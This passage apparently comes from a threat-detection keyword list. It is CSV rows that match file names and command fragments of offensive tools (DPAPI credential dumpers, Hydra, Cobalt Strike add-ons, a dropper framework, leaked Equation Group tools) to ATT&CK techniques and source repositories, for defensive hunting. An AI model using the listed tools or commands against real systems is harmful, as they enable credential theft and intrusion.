Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*dpapi_pick/credhist.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*DPAPImk2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*dpl4hydra *,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*dpl4hydra.sh*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*dpl4hydra_*.csv*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*dpl4hydra_*.tmp*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*dpl4hydra_linksys*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*dploot -*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,0,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*backupkey*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*browser*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*certificates*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*credentials*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*machinecertificates*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*machinecredentials*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*machinemasterkeys*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*machinevaults*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*masterkeys*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*vaults*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*wifi*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot_linux_adm64*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot-main.zip*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dpplabbmogkhghncfbfdeeokoefdjegm*,greyware_tool_keyword,Proxy SwitchySharp,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*dr0op/CrossNet*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*Dr0p1t-Framework*,offensive_tool_keyword,Dr0p1t-Framework,Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) .),T1203 - T1005 - T1064,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/D4Vinci/Dr0p1t-Framework,1,1,N/A,N/A,10,1333,402,2018-11-03T19:00:12Z,2017-02-11T21:24:11Z -*dr4k0nia/NixImports*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*DReverseProxy.git*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*DReverseServer.go*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*drgreenthumb93/CVE-2022-30190-follina*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/drgreenthumb93/CVE-2022-30190-follina,1,1,N/A,N/A,1,10,4,2023-04-20T20:34:05Z,2022-06-01T11:37:08Z -*DriverQuery.exe no-msft*,offensive_tool_keyword,DriverQuery,Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft,T1124 - T1057 - T1082,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*drk1wi/Modlishka*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*droopescan scan drupal -u * -t 32*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Droopscan*,offensive_tool_keyword,Droopscan,A plugin-based scanner to identify issues with several CMSs mainly Drupal & Silverstripe.,T1190 - T1199 - T1505 - T1210 - T1213,TA0005 - TA0009,N/A,N/A,Web Attacks,https://github.com/droope/droopescan,1,0,N/A,N/A,10,1124,248,2023-06-02T14:21:16Z,2014-10-22T22:06:30Z -*drop_malleable_unknown_*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*drop_malleable_with_invalid_*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*drop_malleable_without_*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*dropboxC2.py*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dropper_cs.exe*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*dropper32.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*dropper64.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*drunkpotato.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*drunkpotato.x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*drupal_enum.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*drupwn --mode exploit --target *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Drupwn*,offensive_tool_keyword,Drupwn,Drupal Security Scanner to perform enumerations on Drupal-based web applications.,T1190 - T1195 - T1200 - T1210 - T1211 - T1212 - T1213 - T1221 - T1222,TA0001 - TA0002 - TA0009,N/A,N/A,Web Attacks,https://github.com/immunIT/drupwn,1,0,N/A,N/A,6,543,132,2020-11-04T13:43:29Z,2018-04-04T15:13:27Z -*dsquery * -filter *(objectClass=trustedDomain)* -attr *,greyware_tool_keyword,dsquery,enumerate domain trusts with dsquery,T1482 - T1018,TA0007,N/A,APT41 - FIN8,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dswmiexec.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*dtd-finder*,offensive_tool_keyword,dtd-finder,Identify DTDs on filesystem snapshot and build XXE payloads using those local DTDs.,T1221 - T1228 - T1547,TA0005 - ,N/A,N/A,Exploitation tools,https://github.com/GoSecure/dtd-finder,1,0,N/A,N/A,6,551,100,2021-09-22T17:54:08Z,2019-07-15T20:13:54Z -*dtmsecurity/bof_helper*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) Creation Helper,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dtmsecurity/bof_helper,1,1,N/A,10,10,198,44,2022-05-03T18:56:14Z,2020-07-01T14:50:29Z -*dubmoat*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Defense Evasion,https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*Dubmoat_ExtractData*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Defense Evasion,https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*Dubmoat_PrintFilename*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Defense Evasion,https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*Dubmoat_TruncateFile*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Defense Evasion,https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*DueDLLigence.cs*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,1,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*DueDLLigence.sln*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,1,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*DueDLLigence-master*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - 